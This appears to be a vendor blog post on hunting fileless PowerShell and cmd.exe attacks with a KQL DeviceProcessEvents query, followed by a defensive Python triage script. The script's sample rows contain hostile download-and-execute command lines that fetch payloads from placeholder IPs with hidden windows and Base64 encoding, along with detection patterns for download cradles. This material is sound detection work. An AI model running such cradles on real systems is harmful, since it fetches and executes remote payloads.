Threat Hunting & KQL

The DeviceProcessEvents practical guide: Uncovering Fileless malware

5 min read · Akuity SOC · Delphisoft Deutschland

Attackers use PowerShell and CMD to slip past antivirus. Learn how to track down this fileless malware with the KQL DeviceProcessEvents table.

Today's cyberattacks no longer resemble the viruses of the 2000s. Professional attackers, including ransomware affiliates, know that dropping a malicious executable (.exe) on disk is likely to be caught by antivirus. Their weapon of choice now? “Living off the Land” (LotL), or “fileless”, attacks.

Instead of bringing their own tools, attackers use legitimate programs already present on Windows, such as PowerShell or the Command Prompt (cmd.exe), to execute malicious code directly in memory. To find them, SOC analysts must examine the DeviceProcessEvents table in Microsoft Defender's KQL data.

What is the DeviceProcessEvents table?

In the Microsoft 365 Defender (Advanced Hunting) data model, the DeviceProcessEvents table acts as the operating system's "diary": it records a row each time a process is created on an onboarded machine.

It provides invaluable metadata such as:

  • The process name (FileName).
  • The exact command line executed (ProcessCommandLine).
  • The user account that initiated the action (AccountName).
  • The parent process that spawned it (InitiatingProcessFileName), with the parent's own command line in InitiatingProcessCommandLine.

Suspicious techniques to track down in KQL

To identify a fileless attack, the analyst must look for anomalous behaviour around legitimate utilities. Here are the most common weak signals:

1. Obfuscation (Base64)

A system administrator who automates tasks with PowerShell writes scripts in clear text. An attacker will instead hide the code by encoding it in Base64 and passing it with the -EncodedCommand parameter, which is a strong indicator. Two caveats for the hunt: powershell.exe and pwsh.exe accept any prefix of the switch name, so -e, -ec and -enc all mean -EncodedCommand, and the Base64 wraps UTF-16LE text rather than UTF-8, so a decoder must use that encoding to avoid the NUL bytes that otherwise appear between characters.

2. Stealth downloading

PowerShell is often used as a "dropper" that fetches the ransomware payload from an external command-and-control (C2) server, typically through the .NET Net.WebClient class (DownloadString, DownloadFile) or the Invoke-WebRequest cmdlet, and often hands the result straight to Invoke-Expression so it never touches disk.

3. Silent execution

To avoid tipping off the user of the compromised machine, attackers launch the process without a visible console using the -WindowStyle Hidden switch, and add -NonInteractive so PowerShell never pauses for a prompt. Both are abbreviated in the wild (-w hidden, -NonI), which a hunt query has to account for.

The KQL Template: How to automate hunting

Writing the perfect query to identify these behaviours requires in-depth KQL expertise. Here is an example query that threat hunters use to isolate these processes; the comments mark two gaps a practitioner should keep in mind:

DeviceProcessEvents
| where Timestamp > ago(7d)
// pwsh.exe (PowerShell 7) is a drop-in for powershell.exe and is easy to forget
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe")
// has_any matches whole terms: "-enc" yields the term "enc", but the shorter
// "-e" / "-ec" abbreviations of -EncodedCommand do not, and "bypass" alone is
// noisy on admin hosts, so review the command line rather than trusting the hit
| where ProcessCommandLine has_any("hidden", "encodedcommand", "enc", "bypass", "invoke-webrequest", "net.webclient")
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
| sort by Timestamp desc

The integrated approach with Akuity SOC

For an MSSP or an internal SOC, asking a Level 1 analyst to memorise and retype this kind of query at the start of every shift is an operational risk.

This is why the Akuity SOC platform integrates Quick Query Templates.

In the Multi-Tenant Threat Hunting console, a single click on the “Suspicious Processes” button loads the tuned KQL query for tracking powershell.exe and cmd.exe into the emerald-green input box.

The analyst only has to select the target customer tenant and run the query. The results (time, machine and, above all, the suspicious command line) appear instantly in the interface's asynchronous results grid.

What to do in the event of a positive discovery?

If the query returns a PowerShell execution carrying unexplained Base64 that was started by a Word document (winword.exe as the parent process, for example), treat it as a compromise in progress: a document has no legitimate reason to spawn an encoded PowerShell command, and this is the classic macro-based initial-access pattern.
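The triage step that follows a hit, as an added example in Python (not Akuity SOC or Microsoft code): it runs over rows exported from the query above (same columns as its project clause), decodes the -EncodedCommand payload including the -e and -ec abbreviations from the Base64 section, scores the hidden-window, execution-policy and download indicators from the three technique sections, and applies the Office-parent check from this section. The sample rows, hostnames, account names and IP addresses are constructed; the indicator weights, the 5-point threshold and the Office hosts other than winword.exe are assumptions made for this example.

```python
"""Offline triage of DeviceProcessEvents rows exported from Advanced Hunting.

Added example, not Akuity SOC or Microsoft code. It decodes the Base64 behind
-EncodedCommand (including abbreviations such as -e and -ec, which a has_any()
term filter misses), scores each row against the hidden-window, policy-bypass
and download indicators, and adds the Office-parent check. Sample rows,
hostnames, accounts and IPs are constructed; weights and threshold are assumptions.
"""
import base64
import binascii
import re

# powershell.exe / pwsh.exe accept any prefix of a switch name, so "-e", "-ec",
# "-enco" ... all mean -EncodedCommand. Grab "-e<letters>" followed by a
# Base64-looking token and confirm the letters are a prefix afterwards.
_ENC_RE = re.compile(r"-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Weighted indicators (regex, weight); "encoded_command" is set by the decoder.
INDICATORS = {
    "encoded_command": (None, 3),
    "hidden_window": (re.compile(r"-w[a-z]*\s+hidden", re.I), 2),   # -WindowStyle Hidden, -w hidden
    "non_interactive": (re.compile(r"-noni[a-z]*\b", re.I), 1),     # -NonInteractive, -NonI
    "policy_bypass": (re.compile(r"-e[a-z]*\s+bypass", re.I), 2),   # -ExecutionPolicy Bypass, -ep bypass
    "download_cradle": (re.compile(
        r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I), 3),
    "in_memory_exec": (re.compile(r"invoke-expression|\biex\b", re.I), 2),
}
# The page names winword.exe; the other Office hosts are an assumption of this example.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or invalid.

    PowerShell expects Base64 over UTF-16LE text, not UTF-8; decoding as UTF-8
    is what leaves the familiar NUL bytes between characters.
    """
    for flag, blob in _ENC_RE.findall(cmdline):
        if not "encodedcommand".startswith(flag.lower()):
            continue                     # e.g. -ExecutionPolicy followed by a long token
        try:
            raw = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue                     # not real Base64, leave it for a human
        return raw.decode("utf-16-le", errors="replace")
    return None


def score_row(row):
    """Score one row; returns (score, indicator names, decoded payload or None)."""
    cmdline = row["ProcessCommandLine"]
    decoded = decode_encoded_command(cmdline)
    # Drop the Base64 blob before regex matching so random Base64 characters
    # cannot trigger an indicator; search the visible arguments plus the payload.
    haystack = _ENC_RE.sub(" ", cmdline) + " " + (decoded or "")
    hits, score = [], 0
    for name, (pattern, weight) in INDICATORS.items():
        matched = decoded is not None if pattern is None else bool(pattern.search(haystack))
        if matched:
            hits.append(name)
            score += weight
    if row["InitiatingProcessFileName"].lower() in OFFICE_PARENTS:
        hits.append("office_parent")    # a document spawning a shell: the macro pattern
        score += 4
    return score, hits, decoded


def triage(rows, threshold=5):
    """Keep rows scoring at least `threshold` (assumed cut-off), highest first."""
    findings = []
    for row in rows:
        score, hits, decoded = score_row(row)
        if score >= threshold:
            findings.append({**row, "Score": score, "Indicators": hits, "DecodedCommand": decoded})
    return sorted(findings, key=lambda f: f["Score"], reverse=True)


def encode_command(ps):
    """Encode like an attacker's dropper does: Base64 over UTF-16LE (used for constructed rows)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed rows mirroring the query's `project` columns.
SAMPLE_ROWS = [
    {   # Backup job launched by the Task Scheduler: clear-text script, no other indicator.
        "Timestamp": "2024-05-01T08:00:00Z", "DeviceName": "fs01", "AccountName": "svc_backup",
        "FileName": "powershell.exe",
        "ProcessCommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
        "InitiatingProcessFileName": "svchost.exe",
    },
    {   # Macro-spawned cradle: hidden window, abbreviated switches, Word as parent.
        "Timestamp": "2024-05-01T09:12:33Z", "DeviceName": "ws-042", "AccountName": "jdoe",
        "FileName": "powershell.exe",
        "ProcessCommandLine": "powershell.exe -NoP -W Hidden -ep bypass -enc "
        + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/p.ps1')"),
        "InitiatingProcessFileName": "winword.exe",
    },
    {   # cmd.exe wrapper using the one-letter -e form that a has_any("enc") filter never sees.
        "Timestamp": "2024-05-01T09:15:10Z", "DeviceName": "ws-042", "AccountName": "jdoe",
        "FileName": "cmd.exe",
        "ProcessCommandLine": "cmd.exe /c powershell -NonI -w hidden -e "
        + encode_command(r"Invoke-WebRequest -Uri http://203.0.113.5/x.bin -OutFile $env:TEMP\x.exe"),
        "InitiatingProcessFileName": "explorer.exe",
    },
]

if __name__ == "__main__":
    for f in triage(SAMPLE_ROWS):
        print(f"{f['Score']:>2}  {f['DeviceName']}  {f['InitiatingProcessFileName']} -> {f['FileName']}")
        print("    indicators:", ", ".join(f["Indicators"]))
        if f["DecodedCommand"]:
            print("    decoded:   ", f["DecodedCommand"])
```

The admin's backup job scores only on "bypass" and stays below the threshold, which is the point of scoring rather than matching: the has_any() filter would have returned it as a hit alongside the two real ones. The Base64 blob is stripped before the indicator regexes run so that a long random token cannot produce a false match, and the decoded payload is searched instead.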

The analyst can then switch to the Akuity SOC remediation tab and trigger a "Network Isolation" of the compromised machine (via Intune) with one click, cutting off the attacker's access before the attack can be completed.

Accelerate your proactive investigation: use our pre-integrated KQL templates in our Multi-Tenant Threat Hunting Console to track fileless malware at scale.

Related solution page

Threat Hunting Centralized KQL for MSSP

Track weak signals at scale via our multi-tenant KQL console: asynchronous execution, templates and rate-limiting protection.

Discover the complete solution